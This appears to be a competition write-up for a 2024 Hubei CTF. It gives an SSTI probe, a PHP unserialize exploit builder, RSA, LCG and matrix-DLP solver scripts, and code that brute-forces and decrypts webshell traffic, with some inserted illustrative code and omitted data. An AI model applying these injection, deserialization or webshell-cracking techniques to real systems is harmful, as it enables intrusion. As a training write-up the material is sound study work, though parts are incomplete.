2024 Hubei Province Network and Data Security Practical Skills Competition: Tianquan Xin'an (天权信安) WriteUp

admin, 2024-12-23 10:57:52

This article comes from the Tianquan Xin'an network security ecosystem.

Author: Tianquan Xin'an network security team


Ranking: 8th place in the online round
Challenges solved: 19


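Solutions

WEB.01

✦✦✦ 1. 速算比赛 (Speed Calculation Contest)

Disable JavaScript in the browser and do the 30 calculations by hand to get the flag.

Steps: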


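WEB.02

✦✦✦ 2. Sal的图集 (Sal's Gallery)

Steps:

The response echoes 4, so the Search field has an SSTI (server-side template injection) vulnerability.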


Code:

    /search?name={{2*2}}

WEB.03

✦✦✦ 3. popmart

Steps:


Code:

    <?php
    class popmart {
        public $yuki;
        public $molly;
        public $dimoo;

        public function __construct() {
            $this->yuki = 'tell me where';
            $this->molly = 'dont_tell_you';
            $this->dimoo = "you_can_guess";
        }

        // On unserialize, yuki is overwritten with $where_you_go and compared with molly
        public function __wakeup() {
            global $flag;
            global $where_you_go;
            $this->yuki = $where_you_go;
            if ($this->molly === $this->yuki) {
                echo $flag;
            }
        }
    }

    // Build the object and print its serialized form
    $exploit = new popmart();
    $serialized_exploit = serialize($exploit);
    echo $serialized_exploit;
    ?>

CRYPTO.01

✦✦✦ 4. Mypow

Steps:

Reference:

https://blog.csdn.net/luochen2436/article/details/132138412


Code:

Challenge:

    from Crypto.Util.number import *
    from gmpy2 import *
    import os

    flag = b'xxx'

    def Mypow(b, e, mod):
        a = 1
        while e:
            e >>= 1
            b = (b*b)%mod
            if e&1:
                a = (a*b)%mod
        return a

    def Genp(bit_length):
        coeff = 2 ** 5 * 3 * 7
        while True:
            tmp_prime = getRandomNBitInteger(bit_length - 10)
            p = coeff * tmp_prime + 1
            if is_prime(p):
                break
        return p

    def Genkeys(bit_length):
        p,q = Genp(bit_length),Genp(bit_length)
        n = p * q
        hint = (2 * p + 7 * q) % n
        return n, hint

    if __name__ == '__main__':
        e = next_prime(666)
        n, hint = Genkeys(512)
        m = bytes_to_long(os.urandom(30) + flag)
        ct = Mypow(m,e,n)
        print(f'n = {n}')
        print(f'hint = {hint}')
        print(f'ct = {ct}')
        '''
        n = 36443283250594259606482132779262570582448178589602577809591307671554949253094255209079689901493052116793388954529442162972106210862341856282788030374324677114528044629385805693771773377070021111949953333360526159026822968061585876873187059674130307295006486032106471182393880915860569773206853864515489855553
        hint = 57792516722001523643789088224096258172899052039145876393373730235406451592173971020702024058282699663364267742428240581839287357212741266617791207580236457
        ct = 24482128269957355675512496312977308128712253968496848873519792376434347925427116612997489113223781321628516365811583310346553402215907938918891908853234881284620764982626375301219763593402089309909155204943747718536894186749932544428588048770663458669109073657836937287831725958017345747881678942488157429000
        '''

Factoring n from hint:

    #sage
    # hint = 2p + 7q (no reduction mod n), so p is an integer root of 2x^2 - hint*x + 7n
    R.<x> = ZZ[]
    f = 2*x^2 + 7*n - hint*x
    p = int(f.roots()[0][0])
    q = n//p

The function Mypow(b,e,mod) behaves like pow(m,e,n), but the result depends on the parity of the exponent e: when e is even it equals pow(m,e,n); when e is odd it equals pow(m,e-1,n). In this challenge e = next_prime(666) is a prime (and therefore odd), so the effective exponent is e = next_prime(666)-1. Computing it out, gcd(e,phi)=e, so the problem becomes root extraction in a finite field. Take e-th roots in GF(p) and GF(q) separately, combine them with CRT to obtain every candidate m, then check whether the byte string contains DASCTF to get the flag.

    #sage
    import gmpy2
    from Crypto.Util.number import *

    n = 36443283250594259606482132779262570582448178589602577809591307671554949253094255209079689901493052116793388954529442162972106210862341856282788030374324677114528044629385805693771773377070021111949953333360526159026822968061585876873187059674130307295006486032106471182393880915860569773206853864515489855553
    hint = 57792516722001523643789088224096258172899052039145876393373730235406451592173971020702024058282699663364267742428240581839287357212741266617791207580236457
    ct = 24482128269957355675512496312977308128712253968496848873519792376434347925427116612997489113223781321628516365811583310346553402215907938918891908853234881284620764982626375301219763593402089309909155204943747718536894186749932544428588048770663458669109073657836937287831725958017345747881678942488157429000

    # Factor n: p is an integer root of 2x^2 - hint*x + 7n
    R.<x> = ZZ[]
    f = 2*x^2 + 7*n - hint*x
    p = int(f.roots()[0][0])
    q = n//p

    # Effective exponent: Mypow ignores the low bit of e
    e = int(gmpy2.next_prime(666)) - 1

    # All e-th roots of ct modulo p
    R.<x> = Zmod(p)[]
    f = x^e-ct
    f = f.monic()
    results1 = f.roots()

    # All e-th roots of ct modulo q
    R.<x> = Zmod(q)[]
    f = x^e-ct
    f = f.monic()
    results2 = f.roots()

    # Combine every pair of roots with CRT and look for the flag marker
    for i in results1:
        for j in results2:
            param1 = [int(i[0]),int(j[0])]
            param2 = [p,q]
            m = CRT_list(param1,param2)
            flag = long_to_bytes(int(m))
            if b'DASCTF' in flag:
                print(flag)
                break

Flag:

DASCTF{FastP0w3r_4nd_AMM_0f_R5A}
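The same chain (Mypow's dropped low bit, factoring n from hint, e-th roots modulo each prime, CRT) on small constructed parameters, as an added example that is not code from the original write-up. It uses plain Python rather than Sage's roots(): one root is c^(672^-1 mod k) and the rest come from an element of order 672, which assumes p = 672k + 1 with gcd(k, 672) = 1; the names gen_p, factor_from_hint, roots_mod_prime and recover are hypothetical.

```python
from math import gcd, isqrt

E = 672            # 2**5 * 3 * 7 (coeff in Genp), and also next_prime(666) - 1
MARK = b"DASCTF"


def mypow(b, e, mod):
    """Same logic as the challenge's Mypow: e is shifted before the bit test,
    so bit 0 of e is never used."""
    a = 1
    while e:
        e >>= 1
        b = (b * b) % mod
        if e & 1:
            a = (a * b) % mod
    return a


def is_prime(n):
    return n >= 2 and all(n % d for d in range(2, isqrt(n) + 1))


def gen_p(k):
    """Small analogue of Genp: p = 672*k + 1, restricted to gcd(k, 672) = 1
    (an assumption of this example, not of the challenge)."""
    while not (gcd(k, E) == 1 and is_prime(E * k + 1)):
        k += 1
    return E * k + 1


def factor_from_hint(n, hint):
    """hint = 2p + 7q, so hint*p = 2p^2 + 7n and p is an integer root of
    2x^2 - hint*x + 7n; its discriminant is (2p - 7q)^2."""
    s = isqrt(hint * hint - 56 * n)
    for num in (hint + s, hint - s):
        p = num // 4
        if num % 4 == 0 and 1 < p < n and n % p == 0:
            return p, n // p
    raise ValueError("hint is not 2p + 7q for this n")


def roots_mod_prime(c, P):
    """All x with x^672 = c (mod P), given P = 672*k + 1, gcd(k, 672) = 1
    and c a nonzero 672nd power."""
    k = (P - 1) // E
    r0 = pow(c, pow(E, -1, k), P)       # c^k = 1, so (r0)^672 = c
    h = 2
    while True:                         # look for g of exact order 672
        g = pow(h, k, P)
        if all(pow(g, E // f, P) != 1 for f in (2, 3, 7)):
            break
        h += 1
    roots, x = [], r0
    for _ in range(E):                  # r0 * g^i are the 672 distinct roots
        roots.append(x)
        x = x * g % P
    return roots


def recover(n, hint, ct):
    """Return every CRT candidate whose bytes contain the marker."""
    p, q = factor_from_hint(n, hint)
    inv_p = pow(p, -1, q)
    nbytes = (n.bit_length() + 7) // 8
    roots_q = roots_mod_prime(ct % q, q)
    found = []
    for rp in roots_mod_prime(ct % p, p):
        for rq in roots_q:
            m = rp + p * ((rq - rp) * inv_p % q)      # CRT of (rp, rq)
            raw = m.to_bytes(nbytes, "big").lstrip(b"\0")
            if MARK in raw:
                found.append(raw)
    return found


def demo():
    # Constructed parameters: two ~31-bit primes and a 7-byte plaintext
    p, q = gen_p(3_000_001), gen_p(4_000_001)
    n = p * q
    hint = (2 * p + 7 * q) % n
    msg = b"DASCTF!"
    ct = mypow(int.from_bytes(msg, "big"), 673, n)    # 673 = next_prime(666)
    return recover(n, hint, ct)


if __name__ == "__main__":
    print(demo())
```

The 672 x 672 candidate pairs are why the marker check is needed: raising to an exponent that divides p-1 and q-1 is far from injective.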

CRYPTO.02

✦✦✦ 5. easycrypto

Steps:

Reference:

https://blog.csdn.net/luochen2436/article/details/132964576

Challenge:


Code:

Challenge:

    from Crypto.Util.number import *
    from secret import FLAG

    m = bytes_to_long(FLAG)

    def getpq(nbit):
        p = getPrime(nbit)
        q = getPrime(nbit)
        if p > q:
            return p, q
        else:
            return q, p

    p, q = getpq(512)
    P = (p - q) & ((1 << 130) - 1)
    n = p * q
    leak_p = p >> 256
    c = pow((1 + P * n), m, n ** 3)
    print('n =', n)
    print('leak_p =', leak_p)
    print("c =", c)
    # n = 135133139540786818977969958456509467902948924003478556140490841984247464940261764739984274397650928404945721248284577232814352745333641188749824519153271662051302477973525156608141358709265683759057060630360909926255299541198485901065352661702656282587105799982740927802530997159098015074633017964344230291287
    # leak_p = 115314121469787984258489158421056136177545051135641551928888818017665807264468
    # c = 1836794759996264077871820946090708779709415760553736759453665641907562256633157424959089180650539327925671892742819931875681606982615287882656254828326465758462357812873839261469783652663796071814218493268788421243190729887313099383264588659922912876424206670310928514588754069909128149471326084547056385690037197908766053620702238356084124023146075698878494434053246157524775269473152458661801907641122308756667762880284617915774590075511686821816948174618196839335059944389423693187930672934293905608970421003536691336581450927887931599275461176935079227494931457562345640133982771901848553204154760760399724074615092290799119053032875792219794072963200108352944441876206386518960615891547166767499506114294860833404421893612197040731184031783165365621722947731966143226777081983415797778111715332055871302609049501876860012070502369090417942239749695034267695710324328867728296996779

The high 256 bits of p are leaked, but that is not enough bits; we still need to brute-force 8 more bits before Coppersmith's method can recover p.

    #sage
    from tqdm import *

    n = 135133139540786818977969958456509467902948924003478556140490841984247464940261764739984274397650928404945721248284577232814352745333641188749824519153271662051302477973525156608141358709265683759057060630360909926255299541198485901065352661702656282587105799982740927802530997159098015074633017964344230291287
    p_high = 115314121469787984258489158421056136177545051135641551928888818017665807264468
    c = 1836794759996264077871820946090708779709415760553736759453665641907562256633157424959089180650539327925671892742819931875681606982615287882656254828326465758462357812873839261469783652663796071814218493268788421243190729887313099383264588659922912876424206670310928514588754069909128149471326084547056385690037197908766053620702238356084124023146075698878494434053246157524775269473152458661801907641122308756667762880284617915774590075511686821816948174618196839335059944389423693187930672934293905608970421003536691336581450927887931599275461176935079227494931457562345640133982771901848553204154760760399724074615092290799119053032875792219794072963200108352944441876206386518960615891547166767499506114294860833404421893612197040731184031783165365621722947731966143226777081983415797778111715332055871302609049501876860012070502369090417942239749695034267695710324328867728296996779
    pbits=512

    # Guess the next 8 bits of p, then let small_roots find the remaining low bits
    for i in trange(2**8,1,-1):
        p4 = p_high<<8
        p4 = p4 + i
        kbits = pbits - p4.nbits()
        p4 = p4 << kbits
        PR.<x> = PolynomialRing(Zmod(n))
        f = x + p4
        roots = f.small_roots(X=2^kbits, beta=0.4, epsilon=0.01)
        if roots:
            p = p4+int(roots[0])
            if n%p==0:
                print(i,p)
                break
    #i = 197,p = 13352463043552409670211183534740157814546713901105410408023687926498813469217507846107364405269402732967687839808637375591530105677153038557366731161035343

Compute P, then the binomial expansion gives
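The expansion carried through with the symbols of the challenge code, as an added derivation that is not part of the original write-up. It assumes m < n and gcd(P, n) = 1; every term of the expansion containing (Pn)^k with k ≥ 3 vanishes modulo n^3.

$$c \equiv (1 + Pn)^m \equiv 1 + mPn + \binom{m}{2}P^2n^2 \pmod{n^3}$$

$$\frac{c-1}{n} \equiv mP + \binom{m}{2}P^2 n \pmod{n^2} \;\Longrightarrow\; \frac{c-1}{n} \equiv mP \pmod{n}$$

$$m \equiv \frac{c-1}{n}\cdot P^{-1} \pmod{n}$$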


Solution code:

    import gmpy2
    from Crypto.Util.number import *

    n = 135133139540786818977969958456509467902948924003478556140490841984247464940261764739984274397650928404945721248284577232814352745333641188749824519153271662051302477973525156608141358709265683759057060630360909926255299541198485901065352661702656282587105799982740927802530997159098015074633017964344230291287
    c = 1836794759996264077871820946090708779709415760553736759453665641907562256633157424959089180650539327925671892742819931875681606982615287882656254828326465758462357812873839261469783652663796071814218493268788421243190729887313099383264588659922912876424206670310928514588754069909128149471326084547056385690037197908766053620702238356084124023146075698878494434053246157524775269473152458661801907641122308756667762880284617915774590075511686821816948174618196839335059944389423693187930672934293905608970421003536691336581450927887931599275461176935079227494931457562345640133982771901848553204154760760399724074615092290799119053032875792219794072963200108352944441876206386518960615891547166767499506114294860833404421893612197040731184031783165365621722947731966143226777081983415797778111715332055871302609049501876860012070502369090417942239749695034267695710324328867728296996779
    p = 13352463043552409670211183534740157814546713901105410408023687926498813469217507846107364405269402732967687839808637375591530105677153038557366731161035343
    q = n//p
    P = (p - q) & ((1 << 130) - 1)
    # (c-1)//n is m*P modulo n, so multiplying by P^-1 mod n leaves m
    m = (c-1)//n*gmpy2.invert(P,n) % n
    flag = long_to_bytes(int(m))
    print(flag)
    #DASCTF{365d0d2cda3a3836a19bf1f46760d875}

Flag:

DASCTF{365d0d2cda3a3836a19bf1f46760d875}

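CRYPTO.03

✦✦✦ 6. Another leak of LCG

Steps: This challenge is a reused one. We found existing code for it, found that the code did not run, modified it, and got the result.

Seed recovery logic: start from the last round and work backwards to the seed step by step. In each round only the known (non-*) bits are used, and the integer is built low bit first. The seed is stepped back with the linear congruential formula (seed - b) * inverse(a, M) % M.

Recovering the flag: the original flag is restored with the XOR flag = c ^ seed, where c is the given ciphertext.

Decoding the flag: try different encodings (such as utf-8, latin1), check whether every character is ASCII, and keep the best decoding result.

Formulas used

Seed back-step formula: seed = (seed - b) * inverse(a, M) % M

Flag recovery formula: flag = c ^ seed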


Code:

    from Crypto.Util.number import long_to_bytes

    c = 16881580266371213879199933551551391657843465997606963348664525781336437594162520786815349648165563542125219063481822246500499434326624995868766335675376062002958905249433093212
    a = 7048435472566573813031570507837890091364947084306630050544242220147807292350445564322172244244726206563452305566866223414437853917448623276909090327076693
    b = 9204853069421046007176344891235245198607052139715825810823076231566533652655127030214860066312526149219510111657539481375881111759200483396551737326166933
    # Leaked bits of each LCG output; '*' marks an unknown bit
    x = ['**********************1*****************************************************************************0******************************************************************************************************************1*************************************************************************************1*********************************************0*********************************************************************************************************************************************************1**********', '**1**************************0*********************1************************************************************************************0**********************************************************************************************************************************1******************************0********************************0********************************1*****************************************************************************************************************************************0*********', 
'*************************************************************************************1*********************************1*********************************************************************1**********************************************************************************************************************************************************************0*******************************************************************************1******************************************1********************************', '**************************0**************************************************1***********************0******************************************************1*********************************************************************************************************************0*************************1***********************************************************1******************************************************************1*************0*****************************************************************1****', '******0******************************************************1*************0******************************1****1*********************************************1*******************************************************0*********************************************************************************1*****************************************0******************************************************1**********************************************************************1************************************************', 
'***********************************0******************1**********0*****************************************************************************************************************************************************0*******************************1************************************************************1**************0*************************************1**************************1***************************************************************************************0***********************************', '********************************00************************************************************************00************************************************************************************************************0*******************************0*0********1***********1*1***********1****0***********************************************************************************************************0*********************************************************************0******************************************0', '***************************0******************************************1****************0*************************1**********************0************************************************************************0*************************0***************0****************************0*******1***************1******************0*******************1**********************************************************************************************************************************************0****************0********', 
'**0********************************************************************************1************************1*************************************************************************1*************************1*************************1***************1*****************************************************************************************************************0**********************************01**************1********************************************************************************************0***', '**1*******************************************************************************1*********************************1******0*****************************************************************************************************1*********************************************************************************************1***************1********************************1*************************************0**0******************************************************************************************************', '********************************************************************************************************************************************************0********************************************0***0*************************************************************0*******1***********************0****************************1*********************************************************************************************0**********************************************0*******1**********************************0***', 
'***************************************************************************************************************************0**********************1*********0*********************************************************************************1*******0**********************************************************0*************************************************************************************************1************************************************************************************************************', '******************************************************************************************************0************1**0******************************1******************************************1****************************1******0*****************************************************************************************************************************************************0*******************0*********************0*******************************************************************************************', '****1************1***********************************************************************************************************1*****************************************************1***************************************************1**********************************************************************************************************************0*******************************0*****************0*************************1********************************************0*********0**0***1***********************', 
'******0************************************************************************0***************************************************************************************************************************************************************1**************************************************************************************************************************************************************1********************1********1**************************************************0******************0*************', '**********1********************************1*****************************************************************0*****************************************************************************************************************************************1***1***************0*******************1******************************************************************0****************************************01*****************************************************************************************************************0*', '**********1**************************************************************************************************************************************************************************************************************************************************************************************1******************0******************************************************************************************************************************************************************1****************************************', 
'**************************************************************************************************************************************0************************************************************0***************************************************************************************************************************************************************************************************0***********0**************************************************************0***************1*****************************', '*******************************************************0*********************************************************************************************************************************1****1****************************************************************0*******0*****************************************************************************************************************0***************0*******************************************************************************0**************************************', '*******11***********1*************************1****************************************************************************************************************************************************************************1******************0******************0************************************************************************************************0*****************1*****************************************************************************************************************************************0*', 
'******************************************************************1****************************************************************************************************0**************************************************1********************************************************************************************************************************************************************************************************************************************************0*******1***************************1********', '*******************0**************************************************0****************************************************1*************************************1*********************************************************************************************************************************************************0***************0*******0***************************************************0*******************************************************************************************************1**0*************', '********************1**********1*******************************0*********************11*************************************************************0*************************************************************************0******************************************************************0**********************************************************************************1***************0**1*****************1*********************************************************0********************************************', 
'*************************0********************************************************************************************************0**************01************0************************************************1*****************0**************0*********************1*********0************0*****************************************1***1**************************************************************************0**********************************************1************1********************************************', '*****************************************************************************1***************1*****1***********************************************************************************************************************0****************************************************************************************************1*************************0****************1*************************************************************************0**************************************************************************', '***************1**********1**********************************************************0***************************************************************************************************************0**************0**********1*******************************1*****************************************************************************************0**********************************************************************************************0******************************************************************0****', 
'***1*****************************************************************************************************0***************************************************************************************************************1**************************************************0***************0********************************************************1*******************************************1*****************************************************************************************************************0************', '*********************************************0*1***************************************************0****************************************************************************************************1********************************************************************************************************0*******************************0**************************************************0**********0***********1********************************************************************1**********************0***0***1', '************10*******************************************0**********************************1************************0****************************0*************************************************************************************************1***************************0****0*1**********************************************1******0*************************************************1********************************************************************************************************************************', 
'**************************************1*************0**************1*************1*****************0**********1****************************************************************************************************************************************************************************************************************************************************0********************1*******************0************************************************1***************1**************************************************', '**************************************************************************************************************1****************0*************************1****0******************************************0****************************************************************0***********************************************************************0*************************************************0**********************0**********************************************0**1**************************************************', '******************************************0************************************************************00***********************************************************************************************************************************1*************************************************************************************************************************************************************1***********************1**************************0******************************************************************', 
'******************************************************************************************************1*1***********0*************************************************************0********************************************************************************1*********************************0*******1********************************************************************************************1*****************************1*************************1*************************************1***********************', '**************0******0*************1*********0************************************1******************0**1****************************************************************************************************************************0*************1****************************1****************************************1***********************0*****************************************************************************0********0*1******************1**********************1*******************************************', '***************************1***************************************************************************************************1**********************************1******************************************1********************************************************************************************************************0*********11*****************************************************************************************************************************************************1****************************', 
    # (remaining rows of the masked output list are omitted here)
]

T = 64  # number of LCG outputs checked against x


def gen(s, M):
    # Run the LCG modulo 2**M and return T outputs as 512-character bit strings.
    xx = []
    for _ in range(T):
        s = (a * s + b) % 2**M
        xx.append(bin(s)[2:].zfill(512))
    return xx


def check_seed(s, length, comparison_list):
    # Compare the low `length` bits of every output with the known ('0'/'1') positions.
    seed = int(s, 2)
    X = gen(seed, length)
    for i in range(length):
        for j in range(T):
            if comparison_list[j][-i-1] != "*" and comparison_list[j][-i-1] != X[j][-i-1]:
                return False
    return True


def find_possible_seeds(prefix=""):
    # Extend the candidate seed one bit at a time, from the least significant bit upward.
    if len(prefix) == 512:
        if check_seed(prefix, len(prefix), x):
            XX.append(int(prefix, 2))
    else:
        for bit in ('0', '1'):
            new_prefix = bit + prefix
            if check_seed(new_prefix, len(new_prefix), x):
                find_possible_seeds(new_prefix)


XX = []  # valid seeds found
find_possible_seeds()
print(XX)
for SEED in XX:
    print(long_to_bytes(c ^ SEED))
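The search above works from the least significant bit upward because, modulo a power of two, the low k bits of every LCG output depend only on the low k bits of the seed. The following is an added example, not code from the original write-up, that runs the same pruning iteratively on a constructed 32-bit instance; the multiplier, increment, seed and leak pattern are assumptions made up for the demonstration.

```python
# Added illustration with constructed parameters; not the challenge's a, b or data.
M = 32                    # state width in bits (the write-up's instance uses 512)
T = 16                    # number of leaked outputs (the write-up's instance uses 64)
A = 0x5DEECE6D            # constructed odd multiplier
B = 0xB                   # constructed increment
SECRET_SEED = 0xC0FFEE42  # constructed seed the demo tries to recover


def lcg_outputs(seed, a=A, b=B, m_bits=M, count=T):
    """Return `count` successive states of s -> (a*s + b) mod 2**m_bits."""
    mask = (1 << m_bits) - 1
    out, s = [], seed
    for _ in range(count):
        s = (a * s + b) & mask
        out.append(s)
    return out


def leak(outputs, m_bits=M):
    """Render each output MSB-first and hide most bits behind '*'.

    Bit k of output j is revealed when (5*k + 3*j) % 11 == 0. With at least 11
    outputs this constructed pattern reveals every bit position at least once.
    """
    rows = []
    for j, value in enumerate(outputs):
        bits = format(value, "0{}b".format(m_bits))
        lsb_first = []
        for k in range(m_bits):
            bit_char = bits[m_bits - 1 - k]
            lsb_first.append(bit_char if (5 * k + 3 * j) % 11 == 0 else "*")
        rows.append("".join(reversed(lsb_first)))
    return rows


def consistent(candidate, k, rows, a=A, b=B):
    """Check bit k of every output produced from the low k+1 bits of `candidate`.

    Lower bits were already checked when the candidate was shorter, so only
    column k has to be compared against the leak.
    """
    mask = (1 << (k + 1)) - 1
    s = candidate
    for row in rows:
        s = (a * s + b) & mask
        known = row[-k - 1]
        if known != "*" and int(known) != (s >> k) & 1:
            return False
    return True


def recover_seeds(rows, m_bits=M, a=A, b=B):
    """Return every seed whose outputs agree with all revealed bits."""
    frontier = [0]
    for k in range(m_bits):
        survivors = []
        for cand in frontier:
            for bit in (0, 1):
                extended = cand | (bit << k)
                if consistent(extended, k, rows, a, b):
                    survivors.append(extended)
        frontier = survivors
    return frontier


if __name__ == "__main__":
    leaked_rows = leak(lcg_outputs(SECRET_SEED))
    print(leaked_rows[0])
    print([hex(s) for s in recover_seeds(leaked_rows)])
```

With an odd multiplier, flipping seed bit k flips bit k of every output, so a single revealed bit in a column is enough to discard the wrong branch; a column with no revealed bit doubles the number of surviving candidates.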

CRYPTO.04

✦✦✦ 7 QAQTAT

Steps:

Reference link:

https://dexterjie.github.io/2024/12/01/%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/2024%E7%AC%AC%E4%BA%8C%E5%B1%8A%E7%A6%8F%E5%BB%BA%E7%9C%81%E6%95%B0%E6%8D%AE%E5%AE%89%E5%85%A8%E5%A4%A7%E8%B5%9B/#QAQTAT%E2%80%94%E2%80%94Unsolved

Code:

```
from Crypto.Util.number import *
from hashlib import sha256
from secret import flag

m = bytes_to_long(flag)

def enc(pt, G, A, T, S, p):
    s = randint(0,p-1)
    D = G^s
    E = A*T*A
    F = D*E*D
    K = list(D*S*D)
    key = sum(K[0])+sum(K[1])+sum(K[2])
    mask = int(sha256(str(key).encode()).hexdigest(),16)
    ct = pt ^^ mask
    return ct, F

def dec(ct, Q, F, p):
    K = Q*F*Q
    key = sum(K[0])+sum(K[1])+sum(K[2])
    mask = int(sha256(str(key).encode()).hexdigest(),16)
    pt = ct ^^ mask
    return pt

p = getPrime(256)
Fp2.<i> = GF(p^2, modulus=x^2+1)
M = MatrixSpace(Fp2, 3, 3)
while True:
    Q = M.random_element()
    A = M.random_element()
    if Q*A != A*Q:
        break
T = Q*A*Q
S = T*A*T
r1 = randint(0,p-1)
G = Q^r1
pk = (list(A), list(T), list(S), list(G))
ct, F = enc(m, G, A, T, S, p)
print("p = ",p)
print("pk = ", pk)
print("F = ", list(F))
print("ct = ", ct)
"""
p =  72887242108660141996862343556330151015969690949835567252527194788428065480383
pk =  <entries of the 3x3 matrices A, T, S, G over GF(p^2) omitted>
F =  <entries of the 3x3 matrix F omitted>
ct =  96910798667771988374291172958072220832574586618080134344021393928577220469428
"""
```

step1

```
from Crypto.Util.number import *
from hashlib import sha256

def enc(pt, G, A, T, S, p):
    s = randint(0,p-1)
    D = G^s
    E = A*T*A
    F = D*E*D
    K = list(D*S*D)
    key = sum(K[0])+sum(K[1])+sum(K[2])
    mask = int(sha256(str(key).encode()).hexdigest(),16)
    ct = pt ^^ mask
    return ct, F

p =  72887242108660141996862343556330151015969690949835567252527194788428065480383
Fp2.<i> = GF(p^2, modulus=x^2+1)
M = MatrixSpace(Fp2, 3, 3)
# pk and F take the values printed by the challenge; the long matrix entries are omitted here.
pk = ...  # ([rows of A], [rows of T], [rows of S], [rows of G])
F = ...   # [rows of F]
ct =  96910798667771988374291172958072220832574586618080134344021393928577220469428
A, T, S, G = [M(ii) for ii in pk]
F = M(F)
############################################################### attack
E = A*T*A
detA, detT, detS, detG, detE, detF = A.det(), T.det(), S.det(), G.det(), E.det(), F.det()
r = 2244966557637008779362441591080406338119704738381872153797151
#R = 80839783875482453208291688688697485912290384775841712705111124172946909733768714734343762988749579725275997021760357500939
#r = discrete_log(detG^R, ((detA^(-1)*detT).sqrt())^R, ord=(p^2-1)//R)
#s = discrete_log(((detA^(-2)*detT^(-1)*detF).sqrt())^R, detG^R, ord=(p^2-1)//R)
# not enough, so use cado-nfs
```

step2

```
import subprocess

# t1 and t2 are the two DLP targets modulo p (t2^s = t1, see step3);
# their definition is not included in the write-up. r is the value set in step1.
def cado_dlp(target):
    command = [
        './cado-nfs.py',
        '-dlp',
        '-ell', str(r),
        'target='+str(target),
        str(p)
    ]
    try:
        result = subprocess.run(command, check=True, text=True, capture_output=True)
        print(result.stdout)
    except subprocess.CalledProcessError as e:
        print(f"ERROR: {e.returncode}")
        print("ERROR:", e.stderr)

cado_dlp(t1)  # 1541758195020130454925136833461872657607368759409055632195831
cado_dlp(t2)  # 780392429787953543532147509264510635118839088869098098140941
```

step3

```
#t2^s = t1
Fr = GF(r)
s1 = Fr(1541758195020130454925136833461872657607368759409055632195831)
s2 = Fr(780392429787953543532147509264510635118839088869098098140941)
ss = discrete_log(pow(t1, 6*r, p), pow(t2, 6*r, p), operation="*", ord=(p-1)//r)
s = crt([int(ss), int(s1/s2)], [(p-1)//(6*r), r])
ss = s
for ii in range(6):
    s = ss + ii * (p-1) // 6
    D = G^int(s)
    K = list(D*S*D)
    key = sum(K[0])+sum(K[1])+sum(K[2])
    mask = int(sha256(str(key).encode()).hexdigest(),16)
    pt = ct ^^ mask
    if(D.det()*detE*D.det() == detF):
        print(long_to_bytes(pt))
        break
#QAQ~4_Br0ken_Crypto_Sy5tem~TAT
```
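The determinant reduction behind the commented-out `discrete_log` calls in step1, written out as an added derivation (not part of the original write-up). It uses only the multiplicativity of $\det$ and the definitions in the challenge code, and assumes all determinants are non-zero:

$$T = QAQ \;\Rightarrow\; \det T = (\det Q)^{2}\,\det A \;\Rightarrow\; (\det Q)^{2} = (\det A)^{-1}\det T$$

$$G = Q^{r_1} \;\Rightarrow\; \det G = (\det Q)^{r_1}$$

$$F = DED,\quad D = G^{s},\quad E = ATA \;\Rightarrow\; \det F = (\det G)^{2s}\,(\det A)^{2}\,\det T$$

$$(\det G)^{2s} = (\det A)^{-2}\,(\det T)^{-1}\,\det F$$

Taking square roots gives the two scalar relations the script uses: $\det G$ is a power of $\sqrt{(\det A)^{-1}\det T}$, and $\sqrt{(\det A)^{-2}(\det T)^{-1}\det F}$ is a power of $\det G$ with exponent $s$ (up to the sign of the root). The matrix problem therefore reduces to discrete logarithms of scalars in $\mathbb{F}_{p^2}^{*}$, and once $s$ is known the mask follows from $K = DSD$ exactly as in `enc`.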

CRYPTO.05

✦✦✦ 8 ddd

Steps:

Solved in one go with a tool.

MISC.01

✦✦✦ 9 gza_Cracker

Steps:

The pass is Antsword.

The key, in turn, is in here.

```
echo substr(md5($pass.$key),0,16); // prefix
echo base64_encode(encode(@run($data),$key)); // encrypted data
echo substr(md5($pass.$key),16); // suffix
```

e71f50e9773b23f9 is the prefix, and the key can be brute-forced from it:

```
<?php
    // Candidate values for the key
    $keylist = array(
        "123456", "password", "12345678", "1234", "admin@123", "pussy", "12345", "dragon", "qwerty", "696969",
        "mustang", "letmein", "baseball", "master", "michael", "football", "shadow", "monkey", "abc123", "pass",
        "fuckme", "6969", "jordan", "harley", "ranger", "iwantu", "jennifer", "hunter", "fuck", "2000",
        "test", "batman", "trustno1", "thomas", "tigger", "robert", "access", "love", "buster", "1234567",
        "soccer", "hockey", "killer", "george", "sexy", "andrew", "charlie", "superman", "asshole", "fuckyou",
        "dallas", "jessica", "panties", "pepper", "1111", "austin", "william", "daniel", "golfer", "summer",
        "heather", "hammer", "yankees", "joshua", "Antsw0rd", "maggie", "biteme", "enter", "ashley", "thunder",
        "cowboy", "silver", "richard", "fucker", "orange", "merlin", "michelle", "corvette", "bigdog", "cheese",
        "matthew", "121212", "patrick", "martin", "freedom", "ginger", "blowjob", "nicole", "sparky", "yellow",
        "camaro", "secret", "dick", "falcon", "taylor", "111111", "131313", "123123", "bitch", "hello"
    );
    $pass = "Antsword";
    foreach ($keylist as $key)
    {
        // The working key is the first 16 hex characters of md5(candidate);
        // the prefix is the first 16 hex characters of md5(pass . working key).
        if(substr(md5($pass.substr(md5($key), 0, 16)),0,16)=="e71f50e9773b23f9")
        {
            echo "key is: ".$key."<br>";
            echo "16bit: ".substr(md5($key), 0, 16);
        }
    }
```

With the key recovered, the data can be decrypted:

```
<?php
    // XOR every byte with the key character at index ($i+1) & 15
    function encode($D,$K){
        for($i=0;$i<strlen($D);$i++) {
            $c = $K[$i+1&15];
            $D[$i] = $D[$i]^$c;
        }
        return $D;
    }
    $pass='Antsword';
    $key = 'a18551e65c48f51e';
    $str = ""; // base64-encoded body from the captured traffic goes here
    $data = encode(base64_decode($str), $key);
    echo gzdecode($data);
```
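The key recovery and decryption steps above, combined into one Python routine for analysing a captured response (an added example, not part of the original write-up). The function names, the word list and the sample response are constructed for illustration; the sample uses a made-up key, not the challenge traffic.

```python
import base64
import gzip
import hashlib


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def derive_key(candidate: str) -> str:
    """Working key: the first 16 hex characters of md5(candidate)."""
    return md5_hex(candidate)[:16]


def xor_stream(data: bytes, key: str) -> bytes:
    """Same transform as the PHP encode(): byte i is XORed with key[(i+1) & 15]."""
    k = key.encode()
    return bytes(b ^ k[(i + 1) & 15] for i, b in enumerate(data))


def recover_key(prefix: str, password: str, wordlist):
    """Return (candidate, working_key) whose md5(pass + key) starts with prefix."""
    for candidate in wordlist:
        key = derive_key(candidate)
        if md5_hex(password + key)[:16] == prefix:
            return candidate, key
    return None


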